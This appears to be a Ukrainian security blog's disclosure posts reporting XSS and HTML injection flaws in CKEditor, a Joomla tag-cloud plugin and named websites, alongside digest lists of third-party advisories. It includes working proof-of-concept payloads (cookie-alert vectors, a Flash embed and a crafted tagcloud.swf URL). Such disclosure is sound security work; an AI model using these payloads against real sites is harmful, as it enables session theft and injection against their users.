Websecurity - Веб безпека

20.08.2009

У грудні, 24.12.2008, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті https://www.intradayinvestmentgroup.com (це інвестиційний сайт, власники якого заявляють про високий рівень його безпеки). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2010

XSS:

POST запит на сторінці https://www.intradayinvestmentgroup.com /reg_ru.php в полях: E-Mail, Имя, Фамилия.

XSS (persistent):

• alert(document.cookie)

Окрім того, що код виконується одразу, в подальшому код автоматично спрацьовує на сторінці reg_ru.php.

Insufficient Anti-automation:

https://www.intradayinvestmentgroup.com/reg_ru.php

На сторінці реєстрації відсутній захист від автоматизованих запитів (капча).

Зараз сайт не працює. Цілком можливо, що саме через дірки сайт і припинив свою роботу. Про такі випадки я згадував неодноразово.

В даній добірці уразливості в веб додатках:

• iPhone Safari JavaScript alert Denial of Service (деталі)
• CakePHP 1.1.20 Local File Inclusion Vulnerability (деталі)
• Unauthenticated File Retrieval on Sun Java System Identity Manager “ext” parameter (деталі)
• Cross-site Request Forgery (CSRF) on Sun Java System Identity Manager (деталі)
• High security hole in NullLogic Groupware (деталі)
• Citrix XenCenterWeb Multiple Vulnerabilities (деталі)
• Atlantic SimpleCaddy Shopping Cart Price Manipulation (деталі)
• CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability (деталі)
• LogRover SQL Injection Authentication Bypass (деталі)
• New sork-passwd-h3 packages fix cross-site scripting (деталі)

В даній добірці уразливості в веб додатках:

• IBM Tivoli Storage Manager Express for Microsoft SQL Heap Overflow Vulnerability (деталі)
• Empire Cms 5.1 sql injection (деталі)
• Authentication Bypass, Passwords Leakage and SNMP Injection on 3Com AP 8760 (деталі)
• FCKeditor input sanitization errors (деталі)
• eAccelerator encoder files backup Vulnerability (деталі)
• Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers (деталі)
• Nagios vulnerability (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Cross Site Scripting (XSS) (деталі)
• New ipplan packages fix cross-site scripting (деталі)
• Juice Remote SQL Injection Vulnerability (деталі)

16.11.2009

Після виявлення попередніх XSS та Content Spoofing уразливостей в CKEditor, у липні, 08.07.2009, я знайшов нову Cross-Site Scripting уразливість в CKEditor. Про що найближчим часом повідомлю розробникам редактора.

Дана уразливість аналогічна уразливості в FCKeditor, про яку я писав раніше.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

23.01.2010

XSS:

Це persistent XSS через Flash.

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name=movie value="http://site/xss.swf"><param name="allowscriptaccess" value="always"><embed src="http://site/xss.swf" allowscriptaccess="always"></embed></object>

Дана уразливість в самому редакторі, тому її можна використати на будь-якому сайті, що використовує CKEditor в якості редактора для веб форм.

Уразливі CKEditor 3.0 RC та попередні (та наступні) версії.

Розробник виправляти дану уразливість не став мотивуючи тим, що CKEditor немає вбудованих XSS фільтрів і це задача кожного розробника, що його використовує, фільтрувати вхідні дані. І враховуючи, що даний текстовий редактор має багатий функціонал, не всі вектори XSS атак виправляються, що призводить до появи подібних XSS уразливостей (які можуть призвести до зараження всього сайта XSS-хробаком).

Раніше я вже писав про уразливість в JVClouds3D для Joomla. Така ж уразливість є і в плагіні 3D Cloud (mod_3dcloud), що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в плагіні 3D Cloud для Joomla. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі 3D Cloud 1.3 та попередні версії.

В даній добірці уразливості в веб додатках:

• IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities (деталі)
• Smarty vulnerability (деталі)
• New auth2db packages fix SQL injection (деталі)
• osTicket v1.6 RC4 Admin Login Blind SQLi (деталі)
• AjaxPortal v3.0 Remote File Inclusion Vulnerability (деталі)
• Mega File Manager Remote File Vuln (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES PHP-AddressBook v-4.0.x (деталі)
• Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver) (деталі)
• SIPS v0.2.2 Remote File Inclusion Vulnerability (деталі)
• dedecms v5.3 Arbitrary File Upload Vulnerability (деталі)

18.08.2009

У грудні, 15.12.2008, я знайшов Cross-Site Scripting уразливості на проектах http://pravda.com.ua та http://president.pravda.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проектів.

Стосовно проектів pravda.com.ua раніше я вже писав про уразливості на tabloid.pravda.com.ua .

Детальна інформація про уразливості з’явиться пізніше.

21.01.2010

XSS:

http://pravda.com.ua

• alert(document.cookie)

На сайті використовувався Яndex.Server.

XSS:

http://president.pravda.com.ua

• alert(document.cookie)

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• stunnel: Security bypass (деталі)
• CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities (деталі)
• Multiple vulnerabilities in Kyocera Mita Scanner File Utility (деталі)
• HP System Management Homepage (SMH) for HP-UX, Local Unauthorized Access (деталі)
• Authentication Bypas in BASE version 1.2.4 and prior (деталі)
• New mahara packages fix cross-site scripting (деталі)
• Back door trojan in acajoom-3.2.6 for joomla (деталі)
• New phpmyadmin packages fix several vulnerabilities (деталі)
• SQL INJECTION VULNERABILITY AlumniServer v-1.0.1 (деталі)
• (POST var ‘resetpwemail’) BLIND SQL INJECTION EXPLOIT AlumniServer v-1.0.1 (деталі)

У жовтні, 27.10.2008, я знайшов Cross-Site Scripting уразливості в плагіні Subscribe To Comments для WordPress. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в Subscribe To Comments для WordPress. Що цікаве, дані уразливості я знайшов раніше тих, про які згадав у попоредньому записі, але при публікації я пропустив їх, тому тільки зараз про них написав.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

В даній добірці уразливості в веб додатках:

• Cisco IOS NAT Skinny Call Control Protocol Vulnerability (деталі)
• Cisco IOS MPLS Forwarding Infrastructure Denial of Service Vulnerability (деталі)
• Vulnerability in Cisco IOS While Processing SSL Packet (деталі)
• Cisco IOS Software Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability (деталі)
• MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES FretsWeb 1.2 (деталі)
• PhpPortal v1 Insecure Cookie Handling Vulnerability (деталі)
• HP-UX Running Netscape / Red Hat Directory Server, Remote Cross Site Scripting (XSS) or Remote Denial of Service (DoS) (деталі)
• FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities (деталі)
• fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC (деталі)
• FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit (деталі)